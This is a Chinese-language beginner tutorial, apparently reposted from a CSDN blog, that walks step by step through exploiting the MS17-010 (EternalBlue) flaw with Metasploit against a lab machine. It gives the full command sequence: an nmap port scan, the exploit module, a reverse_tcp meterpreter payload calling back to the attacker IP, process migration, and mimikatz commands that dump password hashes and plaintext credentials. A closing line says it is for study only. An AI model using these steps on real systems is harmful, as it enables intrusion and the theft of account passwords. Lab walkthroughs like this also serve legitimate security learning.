详解新手如何利用ms17-010配合mimikatz获取目标主机账户密码

第一步:使用Nmap扫描目标主机开放端口
要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描

nmap 192.168.48.110

在这里插入图片描述
第二步:获取权限

在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。
运行msf,使用ms17010漏洞。

msf5 > use exploit/windows/smb/ms17_010_eternalblue 

在这里插入图片描述

接下来show options查看需要配置的参数

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

在这里插入图片描述

剩下的就是需要我们设置LHOST、RHOST、payload,分别是攻击机IP、靶机IP、攻击载荷。

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.48.1  //攻击机ip
lhost => 192.168.48.1
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.48.110  //靶机ip
rhost => 192.168.48.110
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //攻击载荷
payload => windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

一切配置完毕后开始攻击

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

这里可以看到我们已经攻击成功了,拿到了靶机的shell。
在这里插入图片描述
拿到权限后先不要着急干别的,这里我们最好先进行进程迁移,确保我们的msf程序在目标机上不会受到干扰

先使用ps命令查看进程

meterpreter > ps

在这里插入图片描述

因为我们是64位操作系统,所以我们选择迁移到64位的进程上。

meterpreter > migrate 516  //这里的516是PID,就是进程ID

在这里插入图片描述
第三步:使用mimikatz模块获取目标机明文密码

使用mimikatz模块

meterpreter > load mimikatz

在这里插入图片描述
获取靶机密码哈希

meterpreter > msv

在这里插入图片描述

获取靶机明文密码

meterpreter > kerberos 

在这里插入图片描述

到这里攻击就结束了,成功拿到了目标机的明文账户密码。

注:本文仅供参考学习,请勿在网上搞破坏,触犯法律者应承担相应的法律责任!

发布了12 篇原创文章 · 获赞 13 · 访问量 2780

猜你喜欢

转载自blog.csdn.net/qq_43573676/article/details/91355049
今日推荐